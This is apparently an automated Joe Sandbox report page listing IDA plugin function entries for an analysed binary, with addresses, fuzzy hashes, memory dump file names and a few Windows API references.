Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction ID: edad74199c6dc54dcfaf7df98daf3a918c7f92430be72d1488edddf6a1e5260e
Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction Fuzzy Hash: 80513862B186C6C6E7258F36E800769A7A1E784B94F489331CB588FAC5CE3FE4458B00

Function 00007FF666DEDACC Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF666DEDE0E

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction ID: 54606fcbee59061af955d488f127209c6a59c24f37e8603baba0c7e7d72944b7
Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction Fuzzy Hash: ABA11662B087C586EB21CF25B4507A9BBA1AB95BC4F058231DE8D8F785DE3ED501CB01

Function 00007FF666DE8804 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF666DE8823

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
Instruction ID: eb3ae09a44d85a73f71f6f51d32e46a3fce6b9ea714a165f2165f405d4b7c909
Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
Instruction Fuzzy Hash: 56518F11F08682E2FA64AB267D1157AD2B16F84BC4F484335DE0DCF7D6EE3EE4064A44

Function 00007FF666DF34F0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF666DF34F4

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction ID: 4864a53ff4ae531998043f55e3a798221c3fa4c696a0a795abe654391a531124
Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction Fuzzy Hash: C1B09220E0BA02C2EA082B217C8221822B47F98700F980238C04C8D330DE3E24E5AB00

Function 00007FF666DE3610 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
Instruction ID: d0f97c433f2ab21fab104e2d834fc1342d2052514191fa1e883d3bbd955bcadc
Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
Instruction Fuzzy Hash: BAD1B766E08682C5EB688E29A55027DB7B0EB45B48F164335CE0D8F7A5DF3BEC45CB40

Function 00007FF666DD9870 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction ID: f7673fc6510b69c0342ddd28083927b5fd60acfbd871ab04946948ddf1fa0642
Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction Fuzzy Hash: 6DC1AD762181E08BD289EB29E47947A73E0F78934DB95816BEF874B685CA3CA414DB10

Function 00007FF666DE2C80 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction ID: 3d11812d635613330b211afd2f4bb3744d6d7d714761956cfabfe4ad42b29d43
Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction Fuzzy Hash: EBB13B72908A96C5E7658F39E05026CBBB0FB49F4CF684235DA4E8F395CF2AD851CB44

Function 00007FF666DEE5E0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction ID: 0ff10c3a46cd3424d704b98a40a6190093cae87677b25df446343b905c6de6e8
Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction Fuzzy Hash: D081A272A087C186E7748B19B48037ABAA1FB85794F544739DA8D8FB99DE3ED4408F00

Function 00007FF666DF6488 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: b78332369169aed8be6dd13cc6d08ed8a401c1151d3c5d6e5b3c154adaf735d2
Instruction ID: 17674f9077c59bb6e7226858588ea8bb968342734c7a70df57ce694b1f5ac847
Opcode Fuzzy Hash: b78332369169aed8be6dd13cc6d08ed8a401c1151d3c5d6e5b3c154adaf735d2
Instruction Fuzzy Hash: 1261C622E0C2D2C6F7648A2AA45467D65B0AF81764F154339EA1DDEFD5DE7FE8008F40

Function 00007FF666DE1DC4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: 96f9cf678df8e6e807d1e04a10bba5c23b72901a3179472046a5700b0a6c86a2
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: 39513536B18A92C5E7248B19E444228B7B1EB55F58F244331DA4D9F795CF3BE852CB80

Function 00007FF666DE21D4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: 1563eabe3166b2c894d0291febe5637a9f2b5b950db8ac882716dc72ac91a5d9
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: 0A514376A28692C5E7748B29E040229B7B0EB64B5CF245235CE4D9F794CF3BE853CB40

Function 00007FF666DE19B4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: db6c8b7d17bc982db4db64abc97d50dd2c6e5954b1d3ce8d7a0360a334694cee
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: 90519276B58A91C2E7248B29E440638B3B1EB45B68F244231CA4D9F795DF3BE857CB40

Function 00007FF666DE1FD0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: ab6d6dff530f3c0e42b875bb47039e40a96634af31262bbb192a2338c07a3aac
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: 71516176A18692C5E7258B29E450229B7B1EB54B5CF244231CA4D9F7E8CF3BED42CB40

Function 00007FF666DE17B0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: a0886f7a7479663f552bf9d9d4db932656e6206a8960f6eba94523be744e99d0
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: 67516276B18691C6E7658B29E88033CB7B1EB45B58F245231CA4D9F794CF3BE852CB40

Function 00007FF666DE1BC0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 10fa2eeec863b6d5999af7abb29950ef30b09b2cae06f3802d4df543d5280bd6
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: 6D516036B18A95C6E7258B29E440268B7B1EB95B58F244231CE4D9F794CF3BE853CB40

Function 00007FF666DE5DA0 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: d1ead2b21d19d1ffc1cf85995ea2ede474f9803b71b89091afcf213fe993218c
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: F441C972C09BCAC4F9A6892815046B8E6A09F62FE0E5853B4DD9DDF3C3DD0F6987C601

Function 00007FF666DE9F10 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction ID: 1e225b38b36c092cc7089817c4d8b6fdc05f71be5fff43890d221b6bdbf3bec7
Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction Fuzzy Hash: 8C41D362718A9582EF04CF2AE914169B3B1FB48FD0B499536EE0DDFB58EE3ED4418700

Function 00007FF666DE8154 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction ID: 33af65aa2877a7930388e7f6fb1d694423c782750dd6bb5a507dd1d4e44b80fb
Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction Fuzzy Hash: 1031A432B18B82C2E7649F25B84013EA6E5AB85BD0F144339EA5D9FBD5DF3DD0114B04

Function 00007FF666DF95E0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction ID: 853171fab749cc03099bdd7a5522e11ee8f7450f606e76a8e89a3d44305f19ce
Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction Fuzzy Hash: 08F06871B18255CADBA88F6DB80262977E0F7483C0F808039E59DCBB04DE3DD4629F04

Function 00007FF666DDD37C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction ID: d083838f54ac795b71f9fdb6f0aa3d55a8970bcecbdee3f784c5c46ce1d0cadd
Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction Fuzzy Hash: 4FA0022594CC0AD4EA549F00F8900352331FB90300B400231E00DCD0F09F3FA400DF00

Function 00007FF666DD76B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF666DD76C7
GetLastError.KERNEL32 ref: 00007FF666DD76D9
GetProcAddress.KERNEL32 ref: 00007FF666DD7715
GetLastError.KERNEL32 ref: 00007FF666DD7727
GetProcAddress.KERNEL32 ref: 00007FF666DD7740
GetLastError.KERNEL32 ref: 00007FF666DD7752
GetProcAddress.KERNEL32 ref: 00007FF666DD776B
GetLastError.KERNEL32 ref: 00007FF666DD777D
GetProcAddress.KERNEL32 ref: 00007FF666DD7799
GetLastError.KERNEL32 ref: 00007FF666DD77AB
GetProcAddress.KERNEL32 ref: 00007FF666DD77C7
GetLastError.KERNEL32 ref: 00007FF666DD77D9
GetProcAddress.KERNEL32 ref: 00007FF666DD77F5
GetLastError.KERNEL32 ref: 00007FF666DD7807
GetProcAddress.KERNEL32 ref: 00007FF666DD7823
GetLastError.KERNEL32 ref: 00007FF666DD7835
